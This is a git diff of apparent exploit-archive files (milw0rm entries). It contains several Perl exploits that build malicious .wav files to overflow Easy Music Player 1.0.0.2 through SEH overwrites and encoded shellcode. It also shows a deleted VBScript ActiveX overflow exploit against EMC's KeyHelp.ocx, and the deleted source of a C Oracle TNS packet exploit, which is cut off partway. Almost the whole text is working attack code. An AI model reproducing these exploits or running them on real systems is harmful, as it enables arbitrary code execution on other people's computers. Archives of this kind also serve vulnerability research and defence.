+"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73". +"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39". +"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45". +"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45". +"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41"; + +$buf = $buf.$nseh.$seh.$nop.$shellcode; + +print "[+] Writing exploit file \n"; +open(FILE,'>$sploitfile'); +print FILE $buf; +close (FILE); +print "[+] Exploit file written : $sploitfile\n"; + + +print "[+] File's name is xpl_sp3.lst\n"; + +# milw0rm.com [2009-07-28] diff --git a/platforms/windows/local/9412.pl b/platforms/windows/local/9412.pl index fd0fa07a1..7d59779c2 100755 --- a/platforms/windows/local/9412.pl +++ b/platforms/windows/local/9412.pl 
@@ -1,39 +1,39 @@ -#!/usr/bin/perl -# by ahwak2000 -# email: 0.w[at]w.cn -# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH) -# http://www.otbcode.com/downloads/easymusicsetup.exe -################################################################### -my $shellcode= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". 
-"\x4e\x56\x43\x46\x42\x30\x5a"; -################################################################### -my $overflow="\x41" x 4128; -my $jmp="\x6F\xBA\x2D\x15";# Universal -my $nop="\x90" x 20; -################################################################### -open(myfile,'>> ahwak2000.wav'); -print myfile $overflow.$jmp.$nop.$shellcode; -################################################################### - -# milw0rm.com [2009-08-11] +#!/usr/bin/perl +# by ahwak2000 +# email: 0.w[at]w.cn +# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH) +# http://www.otbcode.com/downloads/easymusicsetup.exe +################################################################### +my $shellcode= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". 
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". +"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +################################################################### +my $overflow="\x41" x 4128; +my $jmp="\x6F\xBA\x2D\x15";# Universal +my $nop="\x90" x 20; +################################################################### +open(myfile,'>> ahwak2000.wav'); +print myfile $overflow.$jmp.$nop.$shellcode; +################################################################### + +# milw0rm.com [2009-08-11] diff --git a/platforms/windows/local/9418.pl b/platforms/windows/local/9418.pl index 2372b521a..4f039837f 100755 --- a/platforms/windows/local/9418.pl +++ b/platforms/windows/local/9418.pl 
@@ -1,39 +1,39 @@ -#!/usr/bin/perl -# by ThE g0bL!N -#Big thnx: His0k4 -#easy Music Player 1.0.0.2(wav) local Buffer Overflow Exploit (SEH) -################################################################## -my $bof="\x41" x 4132; -my $nsh="\xEB\x06\x90\x90"; -my $seh="\xB8\x15\xC6\x72"; -my $nop="\x90" x 20; -my $sec= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". 
-"\x4e\x56\x43\x46\x42\x30\x5a"; -print $bof.$nsh.$seh.$nop.$sec; -################################################################### -open(myfile,'>> dz.wav'); -print myfile $bof.$nsh.$seh.$nop.$sec; -################################################################### - -# milw0rm.com [2009-08-11] +#!/usr/bin/perl +# by ThE g0bL!N +#Big thnx: His0k4 +#easy Music Player 1.0.0.2(wav) local Buffer Overflow Exploit (SEH) +################################################################## +my $bof="\x41" x 4132; +my $nsh="\xEB\x06\x90\x90"; +my $seh="\xB8\x15\xC6\x72"; +my $nop="\x90" x 20; +my $sec= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". +"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". 
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +print $bof.$nsh.$seh.$nop.$sec; +################################################################### +open(myfile,'>> dz.wav'); +print myfile $bof.$nsh.$seh.$nop.$sec; +################################################################### + +# milw0rm.com [2009-08-11] diff --git a/platforms/windows/local/9420.pl b/platforms/windows/local/9420.pl index 868a2e971..fb514732b 100755 --- a/platforms/windows/local/9420.pl +++ b/platforms/windows/local/9420.pl 
@@ -1,41 +1,41 @@
-#!/usr/bin/perl
-# by hack4love
-# hack4love@hotmail.com
-# first http://www.milw0rm.com/exploits/9412
-# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)
-# http://www.otbcode.com/downloads/easymusicsetup.exe
-############################################################################
-my $bof="\x41" x 4132;
-my $nsh="\xEB\x06\x90\x90";
-my $seh="\x27\x4a\x01\x10";##lame_enc.dll## unvi
-my $nop="\x90" x 20;
-my $sec=
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
-"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
-"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
-"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
-"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
-"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
-"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
-"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
-"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
-"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
-"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
-"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
-"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
-"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
-"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
-"\x4e\x56\x43\x46\x42\x30\x5a";
-print $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-open(myfile,'>> HACK4LOVE.wav');
-print myfile $bof.$nsh.$seh.$nop.$sec;
-###################################################################
-
-# milw0rm.com [2009-08-12]
+#!/usr/bin/perl
+# by hack4love
+# hack4love@hotmail.com
+# first http://www.milw0rm.com/exploits/9412
+# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH)
+# http://www.otbcode.com/downloads/easymusicsetup.exe
+############################################################################
+my $bof="\x41" x 4132;
+my $nsh="\xEB\x06\x90\x90";
+my $seh="\x27\x4a\x01\x10";##lame_enc.dll## unvi
+my $nop="\x90" x 20;
+my $sec=
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47".
+"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48".
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38".
+"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c".
+"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48".
+"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44".
+"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48".
+"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37".
+"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a".
+"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b".
+"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53".
+"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57".
+"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59".
+"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56".
+"\x4e\x56\x43\x46\x42\x30\x5a";
+print $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+open(myfile,'>> HACK4LOVE.wav');
+print myfile $bof.$nsh.$seh.$nop.$sec;
+###################################################################
+
+# milw0rm.com [2009-08-12]
diff --git a/platforms/windows/remote/10008.txt b/platforms/windows/remote/10008.txt
deleted file mode 100755
index 8daa7ebe0..000000000
--- a/platforms/windows/remote/10008.txt
+++ /dev/null
@@ -1,60 +0,0 @@
-<!--
-EMC multiple products KeyWorks KeyHelp Module (keyhelp.ocx 1.2.312) remote
-buffer overflow exploit
-(ie8 xp sp3)
-by Nine:Situations:Group::pyrokinesis
-site: http://retrogod.altervista.org/
-
-tested products:
-EMC Captiva QuickScan Pro 4.6 sp1
-EMC Documentum ApllicationXtender Desktop 5.4
-and possibly other products carrying quickscan
-
-
-CLSID: {B7ECFD41-BE62-11D2-B9A8-00104B138C8C}
-Progid: KeyHelp.KeyCtrl.1
-Binary Path: C:\WINDOWS\system32\KeyHelp.ocx
-KillBitted: False
-Implements IObjectSafety: True
-Safe For Initialization (IObjectSafety): True
-Safe For Scripting (IObjectSafety): True
-
-JumpMaddedID() and JumpURL() methods suffer of the same stack based buffer overflow
-eip is overwritten after 537 bytes through the second argument, you can touch SEH even
--->
-<html>
-<object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C' id='KEYHELPLib' />
-</object>
-<script language='vbscript'>
-//executing calc
-scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
- unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
- unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
- unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
- unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _
- unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _
- unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _
- unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _
- unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _
- unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _
- unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _
- unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _
- unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _
- unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _
- unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _
- unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _
- unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _
- unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _
- unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _
- unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _
- unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _
- unescape("%4e%46%43%46%50%52%45%36%4a%37%45%36%42%30%5a")
-jnk = string(537,"A")
-eip = unescape("%67%41%41%7e") '0x7E414167 call esp user32.dll
-nop = string(16,unescape("%90"))
-mapID=1
-pstrChmFile= jnk + eip + nop + scode
-pstrFrame="aaaaaaaa"
-'KEYHELPLib.JumpMappedID mapID,pstrChmFile,pstrFrame
-KEYHELPLib.JumpURL mapID,pstrChmFile,pstrFrame
-</script>
diff --git a/platforms/windows/remote/10080.txt b/platforms/windows/remote/10080.txt
deleted file mode 100755
index c211e7b10..000000000
--- a/platforms/windows/remote/10080.txt
+++ /dev/null
@@ -1,386 +0,0 @@
-#include <winsock2.h>
-#include <stdio.h>
-#include <string.h>
-#include <windows.h>
-#include <assert.h>
-
-#include <string>
-
-void s_send (SOCKET s, char *msg, DWORD size)
-{
- int sent;
-
- printf ("s_send: begin: %d bytes\n", size);
-
- sent=send (s, (char*)msg, size, 0);
-
- if (sent==SOCKET_ERROR)
- {
- printf ("send() -> SOCKET_ERROR, WSAGetLastError=%d\n", WSAGetLastError());
- } else
-
- if (sent!=size)
- printf ("sent only %d bytes\n", sent);
-
- printf ("s_send: end\n");
-};
-
-void s_recv (SOCKET s)
-{
- char buf[20000];
- int r;
-
- struct timeval t;
- fd_set fd;
-
- t.tv_sec=0;
- t.tv_usec=100000; // 100 ms
-
- printf ("s_recv: begin\n");
-
- FD_ZERO(&fd);
- FD_SET(s, &fd);
-
- if (select (0, &fd, 0, 0, &t))
- // if (select (0, &fd, 0, 0, NULL))
- {
- r=recv (s, buf, 20000, 0);
- if (r!=0 && r!=-1)
- {
- printf ("got %d bytes\n", r);
- }
- else
- {
- printf ("connection lost, r=%d\n", r);
- };
- }
- else
- {
- printf ("select() returns zero\n");
- };
-};
-
-unsigned char NSPTCN[]=
- {
- 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
- 0x01, 0x3A, 0x01, 0x2C, 0x00, 0x41, 0x20, 0x00,
- 0x7F, 0xFF, 0xC6, 0x0E, 0x00, 0x00, 0x01, 0x00,
- 0x00, 0x00, 0x00, 0x3A, 0x00, 0x00, 0x02, 0x00,
- //^^ ^^ cmd len
- 0x61, 0x61, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
- 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
- 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
- 0x00, 0x00
-
- };
-
-#define NSPTCN_HEADER_LEN 58
-
-unsigned char NSPTDA[]=
- {
- 0x00, 0x00, 0x00, 0x00, 0x06, 0x00, 0x00, 0x00,
- // ^^ ^^ packet len
- 0x00, 0x00
- };
-
-#define NSPTDA_HEADER_LEN 10
-
-void s_send_NSPTDA (SOCKET s, char *msg, int size)
-{
- char * buf;
- int sz=size + NSPTDA_HEADER_LEN;
-
- buf=(char*)malloc (sz);
-
- NSPTDA[0]=( sz ) >> 8;
- NSPTDA[1]=( sz ) & 0xFF;
-
- memcpy (buf, NSPTDA, NSPTDA_HEADER_LEN);
- memcpy (buf + NSPTDA_HEADER_LEN, msg, size);
-
- printf ("s_send_NSPTDA: sending %d bytes...\n", sz);
-
- s_send (s, (char*)buf, sz);
-
- free (buf);
-};
-
-void s_send_TNS_command (SOCKET s, const char *cmd)
-{
- unsigned char * pkt;
- int cmd_len=strlen (cmd);
-
- printf ("sending [%s]\n", cmd);
- printf ("len: %d\n", cmd_len);
-
- if (cmd_len<231)
- {
-
- int str_len=strlen(cmd);
- int pkt_len=str_len+58;
-
- pkt=(unsigned char*)malloc (str_len+58);
-
- memcpy (pkt,
- "\x00\x00\x00\x00\x01\x00\x00\x00"
- // plenH, plenL
- "\x01\x3A\x01\x2C\x00\x41\x20\x00"
- "\x7F\xFF\xC6\x0E\x00\x00\x01\x00"
- "\x00\x00\x00\x3A\x00\x00\x02\x00"
- // cmdlenH cmdlenL
- "\x61\x61\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00\x00\x00\x00\x00\x00\x00"
- "\x00\x00", 58);
-
- memcpy (pkt+58, cmd, str_len);
-
- pkt[1]=pkt_len&0xFF;
- pkt[0]=(pkt_len>>8)&0xFF;
-
- pkt[25]=str_len&0xFF;
- pkt[24]=(str_len>>8)&0xFF;
-
- s_send (s, (char*)pkt, pkt_len);
-
- free (pkt);
-
- }
- else
- {
- // something should be modified here in NSPTCN
- assert (0);
- };
-};
-
-bool try_host (char * h)
-{
- struct hostent *hp;
- WSADATA wsaData;
- struct sockaddr_in sin;
- int r;
- struct timeval t;
- fd_set fd;
- SOCKET s;
- char pkt1318[1318];
-
- WSAStartup(MAKEWORD(1, 1), &wsaData);
-
- hp=gethostbyname (h);
- assert (hp!=NULL);
-
- s=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
-
- assert (s!=INVALID_SOCKET);
-
- {
- u_long on=1;
- assert (ioctlsocket(s, FIONBIO, &on) != -1);
- };
-
- sin.sin_family=AF_INET;
- sin.sin_port=htons(1521);
- memcpy(&sin.sin_addr, hp->h_addr, hp->h_length);
-
- r=connect(s, (struct sockaddr *)&sin, sizeof(sin));
-
- t.tv_sec=3;
- t.tv_usec=0;
-
- FD_ZERO(&fd);
- FD_SET(s, &fd);
-
- if (select (0, 0, &fd, 0, &t))
- {
- printf ("connected to %s\n", h);
-
- s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
-
- // waiting for NSPTRS
-
- s_recv(s);
-
- s_send_TNS_command (s, "(DESCRIPTION=(CONNECT_DATA=(SERVICE_NAME=orcl)(CID=(PROGRAM=client.exe)(HOST=client_host)(USER=dennis)))(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.0.115)(PORT=1521)))");
-
- // waiting for NSPTAC
-
- s_recv(s);
-
- // send NA packet
-
- s_send (s,
- "\x00\x9C\x00\x00\x06\x00\x00\x00\x00\x00\xDE\xAD\xBE\xEF\x00\x92"
- "\x0B\x10\x06\x00\x00\x04\x00\x00\x04\x00\x03\x00\x00\x00\x00\x00"
- "\x04\x00\x05\x0B\x10\x06\x00\x00\x08\x00\x01\x00\x00\x0A\xF8\x71"
- "\xC2\x6C\xE1\x00\x12\x00\x01\xDE\xAD\xBE\xEF\x00\x03\x00\x00\x00"
- "\x04\x00\x04\x00\x01\x00\x01\x00\x02\x00\x01\x00\x03\x00\x00\x00"
- "\x00\x00\x04\x00\x05\x0B\x10\x06\x00\x00\x02\x00\x03\xE0\xE1\x00"
- "\x02\x00\x06\xFC\xFF\x00\x02\x00\x02\x00\x00\x00\x00\x00\x04\x00"
- "\x05\x0B\x10\x06\x00\x00\x0C\x00\x01\x00\x11\x06\x10\x0C\x0F\x0A"
- "\x0B\x08\x02\x01\x03\x00\x03\x00\x02\x00\x00\x00\x00\x00\x04\x00"
- "\x05\x0B\x10\x06\x00\x00\x03\x00\x01\x00\x03\x01"
- ,156);
-
- s_recv (s);
-
- // send TTIPRO
-
- s_send (s,
-
- "\x00\x25\x00\x00\x06\x00\x00\x00\x00\x00\x01\x06\x05\x04\x03\x02"
- "\x01\x00\x49\x42\x4D\x50\x43\x2F\x57\x49\x4E\x5F\x4E\x54\x2D\x38"
